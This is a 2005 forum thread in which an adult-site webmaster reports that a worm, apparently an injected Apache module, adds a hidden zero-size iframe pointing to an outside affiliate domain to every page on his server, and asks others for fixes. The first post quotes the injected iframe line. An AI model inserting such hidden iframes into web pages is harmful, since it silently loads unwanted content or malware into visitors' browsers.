|
|
|
|
||||
|
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
 |
|
|||||||
| Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
|
Thread Tools |
05-07-2005, 04:34 PM
|
#1 |
|
Confirmed User
Join Date: Oct 2002
Posts: 183
|
hijacked pages on my server
So I was informed of my pages displaying malicious code just yesterday by a few webmasters, already have been blacklisted at some places. I go through some old galleries and can't find anything weird on them. Then just now as I uploaded NEW html files, THIS BULLSHIT CODE appears on ALL of them at the very top of the page:
IFRAME SRC="http://toolbarpartner.com/in.php?wm=alextor" WIDTH=0 BORDER=0 HEIGHT=0 I've been in touch with my host regarding this (yesterday, before I found this exact HTML code) and this was their response: The problem with the virus is a worm. Are you using any TGP Rotator software, like Comus Thumbs? There is a hole in some software, which we can not figure out, that allows a passthru to install an apache module that shows this virus on all pages. We have been trying to figure out how they get in for a while now with no luck. We are trying to track this down. I recall this happening to someone at ThinkReel but can't seem to dig up the thread now. Any ideas on how to get this shit off my server? Re-uploading pages dont work as my host has told me its an apache module that adds the code on the fly. |
|
|
|
05-07-2005, 04:37 PM
|
#2 |
|
Confirmed User
Join Date: Aug 2002
Location: The Ditch
Posts: 8,919
|
Sorry to hear that, I always enjoyed listing you galleries.
I have a partner account waiting for you at http://www.throatpokers.com/mgp/ Hit me up deep at@ throatpokers.com
__________________
 www.MAKINGCOIN.com icq. 166-662-831 "Start making large coin!" Daddy I Get Paid To Be A Whore - Coming Soon |
|
|
|
|
05-07-2005, 04:47 PM
|
#3 |
|
Boomer Woffen
Industry Role:
Join Date: Nov 2003
Location: Null
Posts: 30,597
|
ask dweeks at swiftwill.com
he got to the bottom of the ujc exploit  Duke
__________________
My mother said, to get things done You'd better not mess with Major Tom |
|
|
|
|
05-07-2005, 04:54 PM
|
#4 |
|
Confirmed User
Join Date: Oct 2002
Posts: 183
|
thanks duke, emailing him now
 |
|
|
|
|
05-07-2005, 05:11 PM
|
#5 |
|
Confirmed User
Join Date: Feb 2004
Posts: 392
|
it happens also when you give the pages a .php extension and upload them ?
maybe a quick fix for teh time being
__________________
.... 
|
|
|
|
|
05-07-2005, 05:28 PM
|
#6 |
|
Confirmed User
Join Date: Oct 2002
Posts: 183
|
yep, php files display the bug as well
|
|
|
|
